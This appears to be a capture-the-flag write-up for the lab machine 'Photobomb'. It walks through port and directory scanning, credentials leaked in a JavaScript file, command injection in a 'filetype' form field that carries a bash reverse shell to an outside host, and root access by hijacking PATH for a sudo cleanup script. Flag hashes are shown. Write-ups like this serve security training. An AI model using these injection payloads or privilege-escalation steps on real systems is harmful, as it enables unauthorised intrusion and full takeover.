Photobomb
Port recognition withnmap
┌──(root@ghost)-[/home/ghost]
└─# nmap photobomb.htb --min-rate 5000 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-16 13:26 EDT
Nmap scan report for photobomb.htb (10.10.11.182)
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 18.42 seconds
nmap reports two open ports
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -c --hc=404 -t 100 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://photobomb.htb/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://photobomb.htb/FUZZ
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000489: 401 7 L 12 W 188 Ch "printer"
000001227: 401 7 L 12 W 188 Ch "printers"
000004295: 401 7 L 12 W 188 Ch "printerfriendly"
000008558: 401 7 L 12 W 188 Ch "printer_friendly"
000013496: 401 7 L 12 W 188 Ch "printer_icon"
000015253: 401 7 L 12 W 188 Ch "printer-icon"
000015485: 401 7 L 12 W 188 Ch "printer-friendly"
000021900: 401 7 L 12 W 188 Ch "printerFriendly"
000045240: 200 22 L 95 W 843 Ch "http://photobomb.htb/"
000047897: 401 7 L 12 W 188 Ch "printersupplies"
000051765: 401 7 L 12 W 188 Ch "printer1"
000052471: 401 7 L 12 W 188 Ch "printer2"
000084465: 401 7 L 12 W 188 Ch "printericon"
000105794: 401 7 L 12 W 188 Ch "printer_2867"
000112086: 401 7 L 12 W 188 Ch "printer_securit"
000154189: 401 7 L 12 W 188 Ch "printer_drivers"
000159305: 401 7 L 12 W 188 Ch "printer_2"
000192008: 401 7 L 12 W 188 Ch "printer_list"
000203184: 401 7 L 12 W 188 Ch "printerdrivers"
000208002: 401 7 L 12 W 188 Ch "printer-ink"
Total time: 0
Processed Requests: 220560
Filtered Requests: 220526
Requests/sec.: 0
┌──(root@ghost)-[/home/ghost]
└─# curl http://photobomb.htb
<!DOCTYPE html>
<html>
<head>
<title>Photobomb</title>
<link type="text/css" rel="stylesheet" href="styles.css" media="all" />
<script src="photobomb.js"></script>
</head>
<body>
<div id="container">
<header>
<h1><a href="/">Photobomb</a></h1>
</header>
<article>
<h2>Welcome to your new Photobomb franchise!</h2>
<p>You will soon be making an amazing income selling premium photographic gifts.</p>
<p>This state of-the-art web application is your gateway to this fantastic new life. Your wish is its command.</p>
<p>To get started, please <a href="/printer" class="creds">click here!</a> (the credentials are in your welcome pack).</p>
<p>If you have any problems with your printer, please call our Technical Support team on 4 4283 77468377.</p>
</article>
</div>
</body>
</html>
After inspecting the source code we found photobomb.js
┌──(root@ghost)-[/home/ghost]
└─# curl http://photobomb.htb/photobomb.js
function init() {
// Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
}
}
window.onload = init;
Credentials found user pH0t0 and password b0Mb!
We need to intercept requests with burpsuite to see what is happening when we click on download photo to print button
Let's try if concatenating with a semicolon we can execute commands by sending a ping to our machine
We receive it, let's try to get a shell
Our payload looks like this
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;bash%20-c%20%27bash%20-i%20>%26%20/dev/tcp/10.10.14.142/1337%200>%261%27%26&dimensions=3000x2000
┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.142] from photobomb.htb [10.10.11.182] 45828
bash: cannot set terminal process group (723): Inappropriate ioctl for device
bash: no job control in this shell
wizard@photobomb:~/photobomb$ cat /home/wizard/user.txt
0d42366432da822cff563ded442b9646
After foward the request we are in the system as wizard user, time to privesc
wizard@photobomb:~/photobomb$ sudo -l
Matching Defaults entries for wizard on photobomb:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
wizard@photobomb:~/photobomb$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
As we can see the last find command is not being called from his absolute path, this can be abused
wizard@photobomb:~/photobomb$ echo '/bin/bash' > /tmp/find;chmod +x /tmp/find;sudo PATH=/tmp:$PATH /opt/cleanup.sh
whoami
root
cat /root/root.txt
e33b84a2e9104d5d04f1f186359ad12e